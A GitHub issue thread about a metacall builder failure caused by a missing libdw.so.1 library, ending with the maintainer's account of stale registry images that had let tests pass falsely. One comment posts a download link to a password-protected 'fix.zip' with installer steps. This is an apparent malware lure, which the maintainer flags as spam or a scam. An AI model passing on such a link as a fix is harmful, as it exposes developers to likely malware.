### ISSUE TITLE
Bug on finding loaders

### ISSUE THREAD

**Issue by ashpect** [metacall/builder#30]
```
+ DOCKER_OUTPUT=[Mon Aug 26 14:35:26] #7 @Error : DynLink error: libdw.so.1: cannot open shared object file: No such file or directory
[Mon Aug 26 14:35:26] #7 @Error : Failed to load extension: /usr/local/lib/plugins/backtrace_plugin/backtrace_plugin
[Mon Aug 26 14:35:26] #7 @Error : Loader load from configuration invalid load from file
[Mon Aug 26 14:35:26] #7 @Error : Failed to load plugin: /usr/local/lib/plugins/backtrace_plugin/metacall.json
0123456789
+ echo [Mon Aug 26 14:35:26] #7 @Error : DynLink error: libdw.so.1: cannot open shared object file: No such file or directory
 [Mon Aug 26 14:35:26] #7 @Error : Failed to load extension: /usr/local/lib/plugins/backtrace_plugin/backtrace_plugin
 [Mon Aug 26 14:35:26] #7 @Error : Loader load from configuration invalid load from file
 [Mon Aug 26 14:35:26] #7 @Error : Failed to load plugin: /usr/local/lib/plugins/backtrace_plugin/metacall.json
 0123456789
+ tr -d \r\n
+ DOCKER_OUTPUT=[Mon Aug 26 14:35:26] #7 @Error : DynLink error: libdw.so.1: cannot open shared object file: No such file or directory [Mon Aug 26 14:35:26] #7 @Error : Failed to load extension: /usr/local/lib/plugins/backtrace_plugin/backtrace_plugin [Mon Aug 26 14:35:26] #7 @Error : Loader load from configuration invalid load from file [Mon Aug 26 14:35:26] #7 @Error : Failed to load plugin: /usr/local/lib/plugins/backtrace_plugin/metacall.json 0123456789```

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ashpect** [comment]
![Screenshot 2024-08-26 at 8 50 35 PM](https://github.com/user-attachments/assets/1899eee0-90d0-44a1-a00b-f8a4e8f38959)


> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Excuse me? 
Spam/Scam?

**Comment by ashpect** [comment]
Weirdest bug ever - 
Commenting the dev test fails the runtime test.

Possible reasons :
1. Dependency on dev test somehow ?? 
- The image used for testing and pulling from dev  and testing and we aren't building for backstrace in runtime, so it doesn't work? 

Tests : 
1. Add backtrace in runtime to pass with comments, not sure if the issue is fixed yet in core - it will probably fail
2. Figure out how the older test were passing.

**Comment by ashpect** [comment]
Fixed 

Apparently due to lack of backtrace in runtime, the image doesn't built, BUTT all our prev tests passed ?? it's because the output image was not updated in registry and we ended up using the dev image unknowingly and passing the tests!!
Fixed by making diff registries, enabled backtrace and the startup flow for builder cache.
